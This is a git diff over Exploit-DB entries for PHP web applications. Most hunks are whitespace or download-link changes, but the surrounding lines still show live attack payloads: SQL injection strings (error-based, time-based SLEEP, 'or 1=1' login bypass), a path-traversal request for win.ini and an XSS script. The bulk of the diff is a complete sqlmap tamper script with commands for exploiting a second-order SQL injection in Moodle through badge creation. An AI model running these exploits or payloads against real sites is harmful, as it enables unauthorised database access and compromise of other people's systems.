12be82e10..eb022ab72 100644 --- a/exploits/php/webapps/43073.txt +++ b/exploits/php/webapps/43073.txt @@ -26,4 +26,4 @@ <input type="text" name="username" value="' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x494853414e2053454e43414e202d ,(SELECT (ELT(4=4,1))),VERSiON(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'efe'='"/> <input name="password" type="password" value="eFe"/> <input type="Submit" name="login" value="Ver Ayari" /> -</form> +</form> \ No newline at end of file diff --git a/exploits/php/webapps/43075.txt b/exploits/php/webapps/43075.txt index b7cd961f5..6f22071fa 100644 --- a/exploits/php/webapps/43075.txt +++ b/exploits/php/webapps/43075.txt @@ -33,4 +33,4 @@ # Payload: S=BeDark' AND SLEEP(5) AND 'DmYc'='DmYc # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43081.txt b/exploits/php/webapps/43081.txt index 018661397..4afccec05 100644 --- a/exploits/php/webapps/43081.txt +++ b/exploits/php/webapps/43081.txt @@ -33,4 +33,4 @@ # Payload: pid=95&action=edit&id=3 AND SLEEP(5) # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43082.txt b/exploits/php/webapps/43082.txt index aa7fc5630..203b0bacb 100644 --- a/exploits/php/webapps/43082.txt +++ b/exploits/php/webapps/43082.txt @@ -43,4 +43,4 @@ </table> </div> <input type="submit" name="submit" value="LOGIN" /> -</form> +</form> \ No newline at end of file diff --git a/exploits/php/webapps/43087.txt b/exploits/php/webapps/43087.txt index 4ef3de413..155ee336b 100644 --- a/exploits/php/webapps/43087.txt +++ b/exploits/php/webapps/43087.txt @@ -29,4 +29,4 @@ # Email: 'or 1=1 or ''=' Pass: anything # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43099.txt b/exploits/php/webapps/43099.txt index 772701775..798fbcea9 100644 --- a/exploits/php/webapps/43099.txt +++ b/exploits/php/webapps/43099.txt @@ -40,4 +40,4 @@ # Payload: id=27 AND SLEEP(5) # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43101.txt b/exploits/php/webapps/43101.txt index 46c7ed9eb..6a12d488f 100644 --- a/exploits/php/webapps/43101.txt +++ b/exploits/php/webapps/43101.txt @@ -26,4 +26,4 @@ <label for="form_password">Password:</label> <input type="password" name="password" id="form_password" /> <input name="login" value="Log In" type="submit"> -</form> +</form> \ No newline at end of file diff --git a/exploits/php/webapps/43106.txt b/exploits/php/webapps/43106.txt index 00ee15d69..32ed258f1 100644 --- a/exploits/php/webapps/43106.txt +++ b/exploits/php/webapps/43106.txt @@ -43,7 +43,4 @@ Upon execution of this CSRF, the Admin Account details will be replaced by ours 4. Solution -The vulnerability will be patched by the vendor in the next release of OctoberCMS.Following changes should be made for a temporary fix (https://github.com/octobercms/october/commit/4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0). - - - +The vulnerability will be patched by the vendor in the next release of OctoberCMS.Following changes should be made for a temporary fix (https://github.com/octobercms/october/commit/4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0). \ No newline at end of file diff --git a/exploits/php/webapps/43108.txt b/exploits/php/webapps/43108.txt index c1974cfa2..31c8ae1c6 100644 --- a/exploits/php/webapps/43108.txt +++ b/exploits/php/webapps/43108.txt @@ -28,10 +28,4 @@ http://localhost/view/friend_profile.php?friend_type=Student&friend_index=[SQL_i Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: friend_type=Student&friend_index=1' AND SLEEP(5) AND 'rliO'='rliO - Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - - - - - + Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) \ No newline at end of file diff --git a/exploits/php/webapps/43128.txt b/exploits/php/webapps/43128.txt index 2fc0a1bb2..e0da6f67a 100644 --- a/exploits/php/webapps/43128.txt +++ b/exploits/php/webapps/43128.txt @@ -24,4 +24,4 @@ Upgrade to the latest version of pfSense (2.3.1_5 on is fixed). This may be perf the console. See https://doc.pfsense.org/index.php/Upgrade_Guide Furthermore, the issues can be mitigated by restricting access to the firewall GUI both with firewall rules and by not allowing untrusted users to have accounts with GUI access, and by not granting untrusted administrators access to the pages in question. Issue was responsibly disclosed to pfSense (security@pfsense.org) on 06/08/2016 and fixed 06/09/2016! -Thank you to Jim P and the pfSense team for the impressive response time. +Thank you to Jim P and the pfSense team for the impressive response time. \ No newline at end of file diff --git a/exploits/php/webapps/43474.rb b/exploits/php/webapps/43474.rb index b6696beac..492f2d6ed 100755 --- a/exploits/php/webapps/43474.rb +++ b/exploits/php/webapps/43474.rb @@ -362,4 +362,4 @@ class MetasploitModule < Msf::Exploit::Remote }) end -end +end \ No newline at end of file diff --git a/exploits/php/webapps/46776.txt b/exploits/php/webapps/46776.txt index 72639384e..49285a15b 100644 --- a/exploits/php/webapps/46776.txt +++ b/exploits/php/webapps/46776.txt @@ -119,4 +119,4 @@ public function uploadPhoto(Request $request) ] ); // Now save your file to the storage and file details at database. -} +} \ No newline at end of file diff --git a/exploits/php/webapps/46959.txt b/exploits/php/webapps/46959.txt index 505f8e034..55e472207 100644 --- a/exploits/php/webapps/46959.txt +++ b/exploits/php/webapps/46959.txt @@ -12,5 +12,4 @@ POC: http://example.com/webmail/calendar/minimizer/index.php?style=[LFI] Example: -http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini - +http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini \ No newline at end of file diff --git a/exploits/php/webapps/47431.txt b/exploits/php/webapps/47431.txt index 43a70111e..9cd8876fb 100644 --- a/exploits/php/webapps/47431.txt +++ b/exploits/php/webapps/47431.txt @@ -57,4 +57,4 @@ Content-Type: text/html; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 176 -('2019-09-26 14:25:01.878572', '1')('2019-09-26 15:16:11.013642', '1')('2019-09-26 15:21:52.962785', '<h1>test')('2019-09-26 15:23:50.367709', '<script>alert("kale")</script>') +('2019-09-26 14:25:01.878572', '1')('2019-09-26 15:16:11.013642', '1')('2019-09-26 15:21:52.962785', '<h1>test')('2019-09-26 15:23:50.367709', '<script>alert("kale")</script>') \ No newline at end of file diff --git a/exploits/php/webapps/47553.md b/exploits/php/webapps/47553.md index 342f464cb..1205f999d 100644 --- a/exploits/php/webapps/47553.md +++ b/exploits/php/webapps/47553.md @@ -76,4 +76,4 @@ The buffer underflow in php-fpm is present in PHP version 5. However, this explo Original anomaly discovered by [d90pwn](https://twitter.com/d90pwn) during Real World CTF. Root clause found by me (Emil Lerner) as well as the way to set php.ini options. Final php.ini options set is found by [beched](https://twitter.com/ahack_ru). -EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47553.zip \ No newline at end of file +EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47553.zip \ No newline at end of file diff --git a/exploits/php/webapps/4841.txt b/exploits/php/webapps/4841.txt index 5f3c78043..2eb24c31d 100644 --- a/exploits/php/webapps/4841.txt +++ b/exploits/php/webapps/4841.txt @@ -86,7 +86,7 @@ www.underwater.itdefence.ru/isniff.rar - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4841.rar (2008-isniff.rar) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4841.rar (2008-isniff.rar) ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] OSVDB: 51280, 51281 diff --git a/exploits/php/webapps/48457.txt b/exploits/php/webapps/48457.txt index e65c72694..5caf84d4b 100644 --- a/exploits/php/webapps/48457.txt +++ b/exploits/php/webapps/48457.txt @@ -37,4 +37,4 @@ Parameter: id (GET) [08:55:01] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.29 -back-end DBMS: MySQL >= 5.0.12 +back-end DBMS: MySQL >= 5.0.12 \ No newline at end of file diff --git a/exploits/php/webapps/49606.py b/exploits/php/webapps/49606.py index bcf548eaa..ab8be137f 100755 --- a/exploits/php/webapps/49606.py +++ b/exploits/php/webapps/49606.py @@ -80,4 +80,4 @@ feed ="""<?xml version="1.0" encoding="UTF-8" ?> """.format(rce) feed_file.write(feed) -feed_file.close() +feed_file.close() \ No newline at end of file diff --git a/exploits/php/webapps/50825.py b/exploits/php/webapps/50825.py index 34ea8b399..19bafde47 100755 --- a/exploits/php/webapps/50825.py +++ b/exploits/php/webapps/50825.py @@ -10,19 +10,19 @@ """ thanks to: - - + - https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/ - - + - https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap - - Miroslav Stampar for maintaining this incredible tool + - Miroslav Stampar for maintaining this incredible tool greetz to: - - @steventseeley - - @fabiusartrel - - @mpeg4codec - - @0x90shell - - @jkbenaim - - jmp + - @steventseeley + - @fabiusartrel + - @mpeg4codec + - @0x90shell + - @jkbenaim + - jmp """ @@ -44,59 +44,59 @@ Moodle 2.7dev (Build: 20131129) to 3.11.5+ 2nd Order SQLi Exploit by muffin (@mufinnnnnnn) How to use: - 1. Define the variables at the top of the tamper() function, example: - username = "teacher's-username" - password = "teacher's-password" - app_root = "http://127.0.0.1/moodle" - course_id = 3 - NOTE: the course_id should be a course that your teacher can + 1. Define the variables at the top of the tamper() function, example: + username = "teacher's-username" + password = "teacher's-password" + app_root = "http://127.0.0.1/moodle" + course_id = 3 + NOTE: the course_id should be a course that your teacher can create badges on - 2. Create a file called `req.txt` that looks like the following. Be + 2. Create a file called `req.txt` that looks like the following. Be sure to update the `Host:` field... - POST + POST /moodle/badges/criteria_settings.php?badgeid=badge-id-replace-me&add=1&type=6 HTTP/1.1 - Host: <your-target-here> - Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) + Host: <your-target-here> + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 - Connection: close + Connection: close sesskey=sess-key-replace-me&_qf__edit_criteria_form=1&mform_isexpanded_id_first_header=1&mform_isexpanded_id_aggregation=0&mform_isexpanded_id_description_header=0&field_firstname=0&field_lastname=0&field_lastname=*&field_email=0&field_address=0&field_phone1=0&field_phone2=0&field_department=0&field_institution=0&field_description=0&field_picture=0&field_city=0&field_country=0&agg=2&description%5Btext%5D=&description%5Bformat%5D=1&submitbutton=Save - 3. Create a file called `req2.txt` that looks like the following. + 3. Create a file called `req2.txt` that looks like the following. Again, be sure to update the `Host:` field... - POST /moodle/badges/action.php HTTP/1.1 - Host: <your-target-here> - Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) + POST /moodle/badges/action.php HTTP/1.1 + Host: <your-target-here> + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 - Connection: close + Connection: close id=badge-id-replace-me&activate=1&sesskey=sess-key-replace-me&confirm=1&return=%2Fbadges%2Fcriteria.php%3Fid%3Dbadge_id-replace-me - 4. Run the following sqlmap command, make sure the tamper argument + 4. Run the following sqlmap command, make sure the tamper argument is pointing at this file: - sqlmap -r req.txt --second-req req2.txt + sqlmap -r req.txt --second-req req2.txt --tamper=./moodle-tamper.py --dbms=mysql --level=5 --prefix='id = 1' --drop-set-cookie --answer="login/index.php'. Do you want to follow?=n,Do you want to process it=y" --test-filter='MySQL >= 5.0.12 AND time-based blind (query SLEEP)' --current-user --batch --flush - NOTES: - - for some reason after the first run sqlmap complains that + NOTES: + - for some reason after the first run sqlmap complains that it cannot fingerprint - the db and will refuse to try enumerating anthing else, + the db and will refuse to try enumerating anthing else, this - is why there is a flush at the end. I'm sure it can be + is why there is a flush at the end. I'm sure it can be fixed... - - you can do error based with this command (if errors are + - you can do error based with this command (if errors are enabled...not likely): - sqlmap -r req.txt --second-req req2.txt + sqlmap -r req.txt --second-req req2.txt --tamper=./moodle-tamper.py --dbms=mysql --level=5 --prefix='id = 1' --level=5 --drop-set-cookie --answer="login/index.php'. Do you want to follow?=n,Do you want to process it=y" --batch --current-user @@ -105,384 +105,384 @@ WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' How it works (briefly): - - In order to get our sql query into the database it's necessary to + - In order to get our sql query into the database it's necessary to create a - badge and add some criteria. It is when adding the critera that + badge and add some criteria. It is when adding the critera that the - sql-to-be-executed-2nd-order is inserted into the database. - Finally, when the badge is enabled the injected sql is executed. - - This tamper script does the following: - - log in to the app - - update cookie/sesskey for both the 1st and 2nd requests - - make all the requests necessary to create the badge, right up + sql-to-be-executed-2nd-order is inserted into the database. + Finally, when the badge is enabled the injected sql is executed. + - This tamper script does the following: + - log in to the app + - update cookie/sesskey for both the 1st and 2nd requests + - make all the requests necessary to create the badge, right up until adding the critera - - sqlmap itself adds the criteria with whatever payload it's testing - - sqlmap makes the 2nd call to enable the badge (runs the injected sql) - - next time around the tamper script will delete the badge that it last - created to prevent have 10000s of badges for the course + - sqlmap itself adds the criteria with whatever payload it's testing + - sqlmap makes the 2nd call to enable the badge (runs the injected sql) + - next time around the tamper script will delete the badge that it last + created to prevent have 10000s of badges for the course Analysis of the bug: - - see http://muffsec.com/blog/moodle-2nd-order-sqli/ + - see http://muffsec.com/blog/moodle-2nd-order-sqli/ Why?: - 1. It's an interesting bug, 2nd order sqli is more rare (or maybe + 1. It's an interesting bug, 2nd order sqli is more rare (or maybe just harder to find?) - 2. It's an interesting use of sqlmap. There are some articles + 2. It's an interesting use of sqlmap. There are some articles talking about using it for 2nd order sqli - but the use cases outlined are relatively straightforward. + but the use cases outlined are relatively straightforward. There's a few hacky things being done - with sqlmap in this script which others might want to do some + with sqlmap in this script which others might want to do some day i.e. - - using the tamper script to authenticate to the app - - updating the Cookie in sqlmap's httpHeader structure - - updating the CSRF token (sesskey) in the body of both the + - using the tamper script to authenticate to the app + - updating the Cookie in sqlmap's httpHeader structure + - updating the CSRF token (sesskey) in the body of both the 1st and 2nd request - 3. I wanted to practice programming/thought it would be fun. Also I + 3. I wanted to practice programming/thought it would be fun. Also I didn't want to reinvent the - wheel with a standalone exploit when sqlmap is just so darn + wheel with a standalone exploit when sqlmap is just so darn good at what it does. Thoughts: - - The exploit is not optimized, halfway through writing I realized + - The exploit is not optimized, halfway through writing I realized there is a badge - duplication feature which would cut the number of requests + duplication feature which would cut the number of requests generated down significantly. - There's probably many other ways it could be improved as well - - I didn't do much testing...it works on my system... - - I would be surprised if anyone ever put a `Teacher` level sqli to + There's probably many other ways it could be improved as well + - I didn't do much testing...it works on my system... + - I would be surprised if anyone ever put a `Teacher` level sqli to practical use - - As a bonus, this bug is also usable as a stored xss - - Would be cool if moodle's bug bounty paid more than kudos + - As a bonus, this bug is also usable as a stored xss + - Would be cool if moodle's bug bounty paid more than kudos """ def get_user_session(username, password, app_root): - """ - - logs in to moodle - - returns session object, cookie, and sesskey - """ + """ + - logs in to moodle + - returns session object, cookie, and sesskey + """ - s = requests.Session() - login_page = "{app_root}/login/index.php".format(app_root=app_root) + s = requests.Session() + login_page = "{app_root}/login/index.php".format(app_root=app_root) - # make first GET request to get cookie and logintoken - r = s.get(login_page, verify=False) + # make first GET request to get cookie and logintoken + r = s.get(login_page, verify=False) - try: - token = re.findall('logintoken" value="(.*?)"', r.text)[0] - except Exception as e: - print("[-] did not find logintoken, is the target correct?") - print(e) - sys.exit(1) + try: + token = re.findall('logintoken" value="(.*?)"', r.text)[0] + except Exception as e: + print("[-] did not find logintoken, is the target correct?") + print(e) + sys.exit(1) - payload = {'username': username, 'password': password, 'anchor': + payload = {'username': username, 'password': password, 'anchor': '', 'logintoken': token} - # make second request to actually log in - # also let's us get the sesskey - r = s.post(login_page, data=payload, allow_redirects=False, + # make second request to actually log in + # also let's us get the sesskey + r = s.post(login_page, data=payload, allow_redirects=False, verify=False) - # third request for session test which activates the session - cookie = r.cookies.get_dict() - r = s.get(r.headers['Location'], verify=False) + # third request for session test which activates the session + cookie = r.cookies.get_dict() + r = s.get(r.headers['Location'], verify=False) - sesskey = re.findall('sesskey":"(.*?)"', r.text)[0] + sesskey = re.findall('sesskey":"(.*?)"', r.text)[0] - if (len(cookie) == 0): - sys.exit("[-] Could not establish session! Are credz correct?") + if (len(cookie) == 0): + sys.exit("[-] Could not establish session! Are credz correct?") - print("[+] Cookie: {} for user \"{}\"".format(cookie, username)) - print("[+] sesskey: {} for user \"{}\"".format(sesskey, username)) + print("[+] Cookie: {} for user \"{}\"".format(cookie, username)) + print("[+] sesskey: {} for user \"{}\"".format(sesskey, username)) - return s, cookie, sesskey + return s, cookie, sesskey def new_badge1(s, sesskey, app_root, course_id): - """ - - this is the first request that gets generated when "add a new badge" - is clicked. - - it returns the `client_id`, `itemid`, and `ctx_id` which are + """ + - this is the first request that gets generated when "add a new badge" + is clicked. + - it returns the `client_id`, `itemid`, and `ctx_id` which are needed on subsequent requests - - returns -1 on failure - """ - target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root) + - returns -1 on failure + """ + target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root) - # badge type is 2 which is a course badge (rather than a site badge) - payload = {'type': 2, 'id': course_id, 'sesskey': sesskey} + # badge type is 2 which is a course badge (rather than a site badge) + payload = {'type': 2, 'id': course_id, 'sesskey': sesskey} - r = s.post(target_url, data=payload, allow_redirects=False, + r = s.post(target_url, data=payload, allow_redirects=False, verify=False) - try: - client_id = re.findall('"client_id":"(.*?)"', r.text)[0] - except Exception as e: - print("[-] failed to grab client_id in new_badge1()") - print(e) - return -1 + try: + client_id = re.findall('"client_id":"(.*?)"', r.text)[0] + except Exception as e: + print("[-] failed to grab client_id in new_badge1()") + print(e) + return -1 - try: - itemid = re.findall('"itemid":(.*?),"', r.text)[0] - except Exception as e: - print("[-] failed to grab itemid in new_badge1()") - print(e) - return -1 + try: + itemid = re.findall('"itemid":(.*?),"', r.text)[0] + except Exception as e: + print("[-] failed to grab itemid in new_badge1()") + print(e) + return -1 - try: - ctx_id = re.findall('&ctx_id=(.*?)&', r.text)[0] - except Exception as e: - print("[-] failed to grab ctx_id in new_badge1()") - print(e) - return -1 + try: + ctx_id = re.findall('&ctx_id=(.*?)&', r.text)[0] + except Exception as e: + print("[-] failed to grab ctx_id in new_badge1()") + print(e) + return -1 - return client_id, itemid, ctx_id + return client_id, itemid, ctx_id def image_signin(s, sesskey, app_root, client_id, itemid, ctx_id): - """ - - sadly, in order to create a badge we have to associate an image - - this request adds an image which is a moodle logo from wikimedia - - returns sourcekey on success - - return -1 on failure - """ + """ + - sadly, in order to create a badge we have to associate an image + - this request adds an image which is a moodle logo from wikimedia + - returns sourcekey on success + - return -1 on failure + """ - target_url = + target_url = "{app_root}/repository/repository_ajax.php?action=signin".format(app_root=app_root) - # repo id 6 is for when we are downloading an image - payload = {'file': + # repo id 6 is for when we are downloading an image + payload = {'file': 'https://upload.wikimedia.org/wikipedia/commons/thumb/c/c6/Moodle-logo.svg/512px-Moodle-logo.svg.png', - 'repo_id': '6', 'p': '', 'page': '', 'env': 'filepicker', + 'repo_id': '6', 'p': '', 'page': '', 'env': 'filepicker', 'accepted_types[]': '.gif', 'accepted_types[]': '.jpe', - 'accepted_types[]': '.jpeg', 'accepted_types[]': '.jpg', + 'accepted_types[]': '.jpeg', 'accepted_types[]': '.jpg', 'accepted_types[]': '.png', 'sesskey': sesskey, - 'client_id': client_id, 'itemid': itemid, 'maxbytes': '262144', + 'client_id': client_id, 'itemid': itemid, 'maxbytes': '262144', 'areamaxbytes': '-1', 'ctx_id': ctx_id} - r = s.post(target_url, data=payload, allow_redirects=False, + r = s.post(target_url, data=payload, allow_redirects=False, verify=False) - try: - sourcekey = re.findall('"sourcekey":"(.*?)","', r.text)[0] - except Exception as e: - print("[-] failed to grab sourcekey in image_signin()") - print(e) - return -1 + try: + sourcekey = re.findall('"sourcekey":"(.*?)","', r.text)[0] + except Exception as e: + print("[-] failed to grab sourcekey in image_signin()") + print(e) + return -1 - return sourcekey + return sourcekey def image_download(s, sesskey, app_root, client_id, itemid, ctx_id, sourcekey): - """ - - continues the image flow started in image_signin(), here the + """ + - continues the image flow started in image_signin(), here the actual download happens - - returns image_id on success - - return -1 on failure - """ + - returns image_id on success + - return -1 on failure + """ - target_url = + target_url = "{app_root}/repository/repository_ajax.php?action=download".format(app_root=app_root) - # repo id 6 is for when we are downloading from an image from a URL - payload = {'repo_id': '6', 'p': '', 'page': '', 'env': + # repo id 6 is for when we are downloading from an image from a URL + payload = {'repo_id': '6', 'p': '', 'page': '', 'env': 'filepicker', 'accepted_types[]': '.gif', 'accepted_types[]': '.jpe', - 'accepted_types[]': '.jpeg', 'accepted_types[]': '.jpg', + 'accepted_types[]': '.jpeg', 'accepted_types[]': '.jpg', 'accepted_types[]': '.png', 'sesskey': sesskey, - 'client_id': client_id, 'itemid': itemid, 'maxbytes': '262144', + 'client_id': client_id, 'itemid': itemid, 'maxbytes': '262144', 'areamaxbytes': '-1', 'ctx_id': ctx_id, - 'title': '512px-Moodle-logo.svg.png', - 'source': + 'title': '512px-Moodle-logo.svg.png', + 'source': 'https://upload.wikimedia.org/wikipedia/commons/thumb/c/c6/Moodle-logo.svg/512px-Moodle-logo.svg.png', - 'savepath': '/', 'sourcekey': sourcekey, 'license': 'unknown', + 'savepath': '/', 'sourcekey': sourcekey, 'license': 'unknown', 'author': 'moodle-hax'} - r = s.post(target_url, data=payload, allow_redirects=False, + r = s.post(target_url, data=payload, allow_redirects=False, verify=False) - try: - image_id = re.findall(',"id":(.*?),"file', r.text)[0] - except Exception as e: - print("[-] failed to grab image_id in image_download()") - print(e) - return -1 + try: + image_id = re.findall(',"id":(.*?),"file', r.text)[0] + except Exception as e: + print("[-] failed to grab image_id in image_download()") + print(e) + return -1 - return image_id + return image_id def new_badge2(s, sesskey, app_root, course_id, image_id, name="sqlmap-badge", description="sqlmap-description"): - """ - - finally we are actually creating the badge - """ - target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root) + """ + - finally we are actually creating the badge + """ + target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root) - # badge type is 2 which is a course badge (rather than a site badge) - payload = {'type': '2', 'id': course_id, 'action': 'new', + # badge type is 2 which is a course badge (rather than a site badge) + payload = {'type': '2', 'id': course_id, 'action': 'new', 'sesskey': sesskey, - '_qf__core_badges_form_badge': '1', + '_qf__core_badges_form_badge': '1', 'mform_isexpanded_id_badgedetails': '1', - 'mform_isexpanded_id_issuancedetails': '1', 'name': name, + 'mform_isexpanded_id_issuancedetails': '1', 'name': name, 'version': '', - 'language': 'en', 'description': description, 'image': image_id, - 'imageauthorname': '', 'imageauthoremail': '', + 'language': 'en', 'description': description, 'image': image_id, + 'imageauthorname': '', 'imageauthoremail': '', 'imageauthorurl': '', - 'imagecaption': '', 'expiry': '0', 'submitbutton': 'Create+badge'} + 'imagecaption': '', 'expiry': '0', 'submitbutton': 'Create+badge'} - r = s.post(target_url, data=payload, allow_redirects=False, + r = s.post(target_url, data=payload, allow_redirects=False, verify=False) - try: - badge_id = re.findall('badges/criteria.php\?id=(.*?)"', r.text)[0] - except Exception as e: - #print("[-] failed to grab badge_id in new_badge2()") - #print(e) - return -1 + try: + badge_id = re.findall('badges/criteria.php\?id=(.*?)"', r.text)[0] + except Exception as e: + #print("[-] failed to grab badge_id in new_badge2()") + #print(e) + return -1 - return badge_id + return badge_id def delete_badge(s, sesskey, app_root, course_id, badge_id): - """ - - delete the badge - """ - target_url = "{app_root}/badges/index.php".format(app_root=app_root) + """ + - delete the badge + """ + target_url = "{app_root}/badges/index.php".format(app_root=app_root) - # badge type is 2 which is a course badge (rather than a site badge) - payload = {'sort': 'name', 'dir': 'ASC', 'page': '0', 'type': '2', - 'id': course_id, 'delete': badge_id, 'confirm': '1', + # badge type is 2 which is a course badge (rather than a site badge) + payload = {'sort': 'name', 'dir': 'ASC', 'page': '0', 'type': '2', + 'id': course_id, 'delete': badge_id, 'confirm': '1', 'sesskey': sesskey} - # TODO: add validation logic - r = s.post(target_url, data=payload, allow_redirects=False, + # TODO: add validation logic + r = s.post(target_url, data=payload, allow_redirects=False, verify=False) def tamper(payload, **kwargs): - username = "teacher" - password = "password" - app_root = "http://127.0.0.1/moodle" - course_id = 3 + username = "teacher" + password = "password" + app_root = "http://127.0.0.1/moodle" + course_id = 3 - # check if cookie is set - # cookie should not be set in the request file or this script will fail - # + # check if cookie is set + # cookie should not be set in the request file or this script will fail + # https://stackoverflow.com/questions/946860/using-pythons-list-index-method-on-a-list-of-tuples-or-objects - try: - cookie_index = [x[0] for x in conf.httpHeaders].index('Cookie') - except ValueError: - # if no cookie is found we run the session initialization routine - s, cookie, sesskey = get_user_session(username, password, app_root) + try: + cookie_index = [x[0] for x in conf.httpHeaders].index('Cookie') + except ValueError: + # if no cookie is found we run the session initialization routine + s, cookie, sesskey = get_user_session(username, password, app_root) - # this updates the sqlmap cookie - conf.httpHeaders.append(('Cookie', + # this updates the sqlmap cookie + conf.httpHeaders.append(('Cookie', 'MoodleSession={}'.format(cookie['MoodleSession']))) - # here we're making our own global variable to hold the sesskey + # here we're making our own global variable to hold the sesskey and session object - conf.sesskey = sesskey - conf.s = s + conf.sesskey = sesskey + conf.s = s - # check if a badge_id is set, if so delete it before making the new one - try: - conf.badge_id is None - delete_badge(conf.s, conf.sesskey, app_root, course_id, + # check if a badge_id is set, if so delete it before making the new one + try: + conf.badge_id is None + delete_badge(conf.s, conf.sesskey, app_root, course_id, conf.badge_id) - except AttributeError: - # we should only hit this on the very first run - # we hit the AttributeError because conf.badge_id doesn't exist yet - pass + except AttributeError: + # we should only hit this on the very first run + # we hit the AttributeError because conf.badge_id doesn't exist yet + pass - # - ## do all the badge creation flow up the point of adding the criteria - # - client_id, itemid, ctx_id = new_badge1(conf.s, conf.sesskey, + # + ## do all the badge creation flow up the point of adding the criteria + # + client_id, itemid, ctx_id = new_badge1(conf.s, conf.sesskey, app_root, course_id) - sourcekey = image_signin(conf.s, conf.sesskey, app_root, client_id, + sourcekey = image_signin(conf.s, conf.sesskey, app_root, client_id, itemid, ctx_id) - image_id = image_download(conf.s, conf.sesskey, app_root, + image_id = image_download(conf.s, conf.sesskey, app_root, client_id, itemid, ctx_id, sourcekey) - # we need to store the badge_id globally - conf.badge_id = new_badge2(conf.s, conf.sesskey, app_root, + # we need to store the badge_id globally + conf.badge_id = new_badge2(conf.s, conf.sesskey, app_root, course_id, image_id) - # - if badge creation failed try deleting the last known badgeid - # - it's most likely failing because a badge already exists with + # - if badge creation failed try deleting the last known badgeid + # - it's most likely failing because a badge already exists with the same name - # - yes, it's ugly - # - if you control+c and there is a badge with some BS criteria you + # - yes, it's ugly + # - if you control+c and there is a badge with some BS criteria you will - # only see an error on the badge management page and won't be - # able to delete it through moodle - # - if the trouble badgeid is known it can be deleted to resolve + # only see an error on the badge management page and won't be + # able to delete it through moodle + # - if the trouble badgeid is known it can be deleted to resolve the issue - if (conf.badge_id == -1): - with open("/tmp/last-known-badge-id", "r") as f: - conf.badge_id = f.read() - delete_badge(conf.s, conf.sesskey, app_root, course_id, + if (conf.badge_id == -1): + with open("/tmp/last-known-badge-id", "r") as f: + conf.badge_id = f.read() + delete_badge(conf.s, conf.sesskey, app_root, course_id, conf.badge_id) - conf.badge_id = new_badge2(conf.s, conf.sesskey, app_root, + conf.badge_id = new_badge2(conf.s, conf.sesskey, app_root, course_id, image_id) - if (conf.badge_id == -1): - sys.exit("[-] ya done fucked up...") + if (conf.badge_id == -1): + sys.exit("[-] ya done fucked up...") - with open("/tmp/last-known-badge-id", "w") as f: - f.write(conf.badge_id) + with open("/tmp/last-known-badge-id", "w") as f: + f.write(conf.badge_id) - # - update the sesskey and badge_id in the body of the requests - # - it seems necessary to update both the conf.parameters and + # - update the sesskey and badge_id in the body of the requests + # - it seems necessary to update both the conf.parameters and conf.paramDict structures - post = + post = ("sesskey={sesskey}&_qf__edit_criteria_form=1&mform_isexpanded_id_first_header=1&" "mform_isexpanded_id_aggregation=0&mform_isexpanded_id_description_header=0&field_firstname=0&" "field_lastname=0&field_lastname=*&field_email=0&field_address=0&field_phone1=0&field_phone2=0&" "field_department=0&field_institution=0&field_description=0&field_picture=0&field_city=0&" "field_country=0&agg=2&description[text]=&description[format]=1&submitbutton=Save".format(sesskey=conf.sesskey)) - get = "badgeid={badge_id}&add=1&type=6".format(badge_id=conf.badge_id) + get = "badgeid={badge_id}&add=1&type=6".format(badge_id=conf.badge_id) - conf.parameters = {'(custom) POST': post, - 'GET': get, - 'Host': conf.parameters['Host'], - 'Referer': conf.parameters['Referer'], - 'User-Agent': conf.parameters['User-Agent']} + conf.parameters = {'(custom) POST': post, + 'GET': get, + 'Host': conf.parameters['Host'], + 'Referer': conf.parameters['Referer'], + 'User-Agent': conf.parameters['User-Agent']} - conf.paramDict = {'(custom) POST': OrderedDict([('#1*', post)]), - 'GET': OrderedDict([('badgeid', conf.badge_id), - ('add', '1'), - ('type', '6')]), - 'Host': {'Host': conf.parameters['Host']}, - 'Referer': {'Referer': + conf.paramDict = {'(custom) POST': OrderedDict([('#1*', post)]), + 'GET': 